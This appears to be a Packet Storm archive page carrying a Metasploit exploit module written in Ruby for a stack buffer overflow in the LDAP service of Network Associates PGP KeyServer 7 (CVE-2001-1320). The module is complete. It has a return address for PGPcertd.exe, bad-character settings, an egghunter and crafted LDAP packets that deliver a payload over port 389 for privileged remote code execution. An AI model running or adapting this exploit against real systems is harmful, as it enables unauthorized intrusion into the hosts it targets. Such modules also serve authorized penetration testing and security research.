exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Network Associates PGP KeyServer 7 LDAP Buffer Overflow

Network Associates PGP KeyServer 7 LDAP Buffer Overflow
Posted Nov 5, 2010
Authored by patrick | Site metasploit.com

This Metasploit module exploits a stack overflow in the LDAP service that is part of the NAI PGP Enterprise product suite. This Metasploit module was tested against PGP KeyServer v7.0. Due to space restrictions, egghunter is used to find our payload - therefore you may wish to adjust WfsDelay.

tags | exploit, overflow
advisories | CVE-2001-1320
SHA-256 | da96c2a19be199b131c7fc8a865bf1900872f9605e31b1421acca3503f58840f

Network Associates PGP KeyServer 7 LDAP Buffer Overflow

Change Mirror Download
##
# $Id: pgp_keyserver7.rb 10908 2010-11-04 23:50:35Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Egghunter

def initialize(info = {})
super(update_info(info,
'Name' => 'Network Associates PGP KeyServer 7 LDAP Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in the LDAP service that is
part of the NAI PGP Enterprise product suite. This module was tested
against PGP KeyServer v7.0. Due to space restrictions, egghunter is
used to find our payload - therefore you may wish to adjust WfsDelay.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10908 $',
'References' =>
[
[ 'CVE', '2001-1320' ],
[ 'OSVDB', '4742' ],
[ 'BID', '3046' ],
[ 'URL', 'http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/' ],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 450,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
["Universal PGPcertd.exe", { 'Ret' => 0x00436b23 }], # push esp; ret PGPcertd.exe - patrick tested ok 2k/xp
],
'DisclosureDate' => 'Jul 16 2001',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(389)
], self.class)
end

def exploit
connect

# - Maximum payload space is 102 so we use EggHunter instead.
# - The PAYLOAD is put inside an invalid, rejected (but hunt-able) request.

hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
egg = hunter[1]

eggstart = "\x30\x82\x01\xd9\x02\x01\x01\x60\x82\x01\xd2\x02\x01\x03\x04\x82\x01\xc9" # ldapsearch sniff
eggend = "\x80\x00"

print_status("Sending trigger and hunter first...")

buf = "\x30\xfe\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x02\x0a\x01\x00\x02\x01\x00" # PROTOS suite sniff
buf << [target['Ret']].pack('V') + hunter[0]
buf << "\x00"

sock.put(buf)

disconnect

connect

print_status("Sending hunted payload...")
sock.put(eggstart+egg+eggend)

handler
disconnect
end

end
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close